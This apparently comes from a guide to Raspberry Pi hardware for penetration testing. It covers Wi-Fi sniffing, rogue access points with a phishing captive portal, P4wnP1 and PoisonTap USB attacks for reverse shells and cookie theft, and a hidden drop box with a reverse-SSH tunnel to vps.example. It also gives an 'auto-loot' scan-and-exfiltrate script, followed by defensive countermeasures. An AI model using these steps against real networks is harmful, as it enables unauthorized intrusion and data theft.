Ethical hacking is lawful only with explicit consent; South Africa’s Cybercrimes Act treats un-authorised access as a felony . Always draft a written scope, identify data-at-rest boundaries, and agree on a remediation path before testing.

1.1 Install Kali Linux ARM

1. Grab a Class-10 (≥16 GB) micro-SD card .
2. Use Raspberry Pi Imager → “Other OS → Kali Linux ARM” to flash .
3. Enable ssh and wifi in an ssh file and wpa_supplicant.conf on the boot partition.
4. Boot, change default credentials, update packages: sudo apt update && sudo apt full-upgrade.

1.2 Attach External Radios

Many attacks need monitor-mode Wi-Fi. Popular adapters include Alfa AWUS036NHA for 2.4 GHz sniffing .

2.1 Passive Packet Capture

1. Put the adapter in monitor mode: sudo airmon-ng start wlan1.
2. Capture traffic: sudo airodump-ng wlan1mon --write corp.
3. Analyse with Wireshark; filter by eapol frames for WPA2 handshakes.

This technique lets you benchmark signal coverage and verify rogue clients without transmitting packets .

2.2 Rogue Access Point Simulation

1. Install hostapd and dnsmasq.
2. Configure NAT with iptables-persistent so rules survive reboot .
3. Set up a captive portal (e.g., wifiphisher) to demonstrate credential harvesting risk.

NOTE — do this only on an isolated lab network or Faraday-shielded room.

3.1 P4wnP1 ALOA (Pi Zero W)

P4wnP1 turns a Pi Zero into a programmable USB HID, ethernet-over-USB, and Wi-Fi C2 bridge . Flash its custom image, edit payload.txt, then plug into a locked workstation to spawn a reverse shell.

3.2 PoisonTap-Style MITM

1. Clone and run Samy Kamkar’s PoisonTap on a Pi Zero.
2. Upon USB insertion, the Pi presents as a low-priority NIC and hijacks all HTTP traffic to siphon cookies .

Test demonstrates the value of “USB Restricted Mode” and physical port locks in corporate fleets.

4.1 Reverse-SSH Tunnel

1. Auto-connect to your VPS on boot:

   
   autossh -M 0 -N -o "ServerAliveInterval 30" \
   -R 2222:localhost:22 tester@vps.example
   

2. Hide the Pi behind a printer or VoIP phone; access it via ssh -p2222 tester@vps.example.

Artifice Security’s guide lays out wiring diagrams and OpenVPN hardening .

4.2 Auto-Loot Script Skeleton

#!/bin/bash
LOG=/var/log/loot.log
nmap -sV 10.0.0.0/24 -oX /tmp/map.xml && echo "$(date) map done" >> $LOG
python3 exfil.py /tmp/map.xml

5.1 UART / JTAG Discovery

Connect Pi GPIO UART to the target’s debug headers; brute-baud with fUART or auto-bauds to locate console pins. Useful for IoT devices lacking signed firmware updates .

5.2 I²C Sensor Spoofing

Use i2c-gpio-custom overlay to emulate malicious sensors that feed tampered readings to industrial controllers—highlighting the need for CRC and authentication on field buses.

1. Patch and monitor Raspberry Pi: enable ufw, disable SSH password auth, install fail2ban.
2. Use 802.1X or MACsec to block rogue wired devices on corporate switches.
3. Deploy WIDS sensors (Kismet supports Pi) to flag new SSIDs or de-auth floods .
4. Set mobile-device “USB Restricted Mode” and lock BIOS to thwart BadUSB attacks.

• Kali Linux on Pi 4 docs
• Sunfounder Kali Linux Pi guide
• Wi-Fi Sniffer tutorial
• Rogue AP setup notes
• P4wnP1 repository
• PoisonTap BadUSB-ETH article
• Pentest Drop-Box build
• SA Cybercrimes Act analysis
• Hacking tool roundup 2025
• Pi hardware hacking discussions